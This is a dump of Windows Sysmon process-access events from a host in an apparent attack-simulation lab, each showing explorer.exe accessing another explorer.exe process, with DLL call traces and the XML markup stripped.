22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 